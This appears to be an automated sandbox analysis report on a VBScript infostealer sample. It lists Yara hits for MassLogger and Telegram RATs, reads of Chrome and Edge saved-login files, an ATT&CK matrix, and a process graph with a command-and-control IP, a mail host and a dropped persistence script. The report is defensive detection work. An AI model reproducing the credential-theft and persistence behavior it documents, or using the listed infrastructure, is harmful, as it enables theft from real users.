                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 30.2.powershell.exe.a64805c.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.a64805c.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.a380b24.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.a1538b4.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.a1538b4.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.a72a22c.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.a72a22c.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.a380b24.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 30.2.powershell.exe.a64805c.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.a64805c.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.a380b24.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.a1538b4.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.a1538b4.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.a72a22c.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.a72a22c.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.a380b24.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information222
                  Scripting                  		Valid Accounts1
                  Native API                  		222
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		12
                  Process Injection                  		3
                  Obfuscated Files or Information                  		1
                  Input Capture                  		12
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		1
                  Office Application Startup                  		11
                  Registry Run Keys / Startup Folder                  		2
                  Software Packing                  		Security Account Manager111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts4
                  PowerShell                  		11
                  Registry Run Keys / Startup Folder                  		Login Hook1
                  DLL Side-Loading                  		NTDS2
                  Process Discovery                  		Distributed Component Object Model1
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets131
                  Virtualization/Sandbox Evasion                  		SSH1
                  Clipboard Data                  		23
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Process Injection                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1596083 Sample: Annual Leave sheet 2025.vbs Startdate: 21/01/2025 Architecture: WINDOWS Score: 100 125 reallyfreegeoip.org 2->125 127 mail.privateemail.com 2->127 129 3 other IPs or domains 2->129 139 Sigma detected: Register Wscript In Run Key 2->139 141 Found malware configuration 2->141 143 Malicious sample detected (through community Yara rule) 2->143 147 17 other signatures 2->147 12 wscript.exe 1 2->12         started        15 wscript.exe 2->15         started        17 wscript.exe 2->17         started        19 6 other processes 2->19 signatures3 145 Tries to detect the country of the analysis system (by using the IP) 125->145 process4 signatures5 173 VBScript performs obfuscated calls to suspicious functions 12->173 175 Wscript starts Powershell (via cmd or directly) 12->175 177 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->177 179 3 other signatures 12->179 21 cmd.exe 1 12->21         started        24 cmd.exe 15->24         started        26 cmd.exe 17->26         started        28 cmd.exe 19->28         started        30 cmd.exe 19->30         started        32 cmd.exe 19->32         started        34 3 other processes 19->34 process6 signatures7 157 Suspicious powershell command line found 21->157 159 Wscript starts Powershell (via cmd or directly) 21->159 161 Bypasses PowerShell execution policy 21->161 163 PowerShell case anomaly found 21->163 36 powershell.exe 35 21->36         started        40 conhost.exe 21->40         started        42 cmd.exe 24->42         started        45 conhost.exe 24->45         started        47 2 other processes 26->47 49 2 other processes 28->49 51 2 other processes 30->51 53 2 other processes 32->53 55 6 other processes 34->55 process8 dnsIp9 137 45.200.149.104, 49708, 5000 Africa-on-Cloud-ASZA Seychelles 36->137 109 C:\Users\user\AppData\...\windowsupdate.vbS, ASCII 36->109 dropped 111 C:\Users\user\AppData\...\ilcg05nv.cmdline, Unicode 36->111 dropped 57 wscript.exe 2 36->57         started        65 3 other processes 36->65 165 Suspicious powershell command line found 42->165 167 Wscript starts Powershell (via cmd or directly) 42->167 61 powershell.exe 42->61         started        63 conhost.exe 42->63         started        67 2 other processes 47->67 69 2 other processes 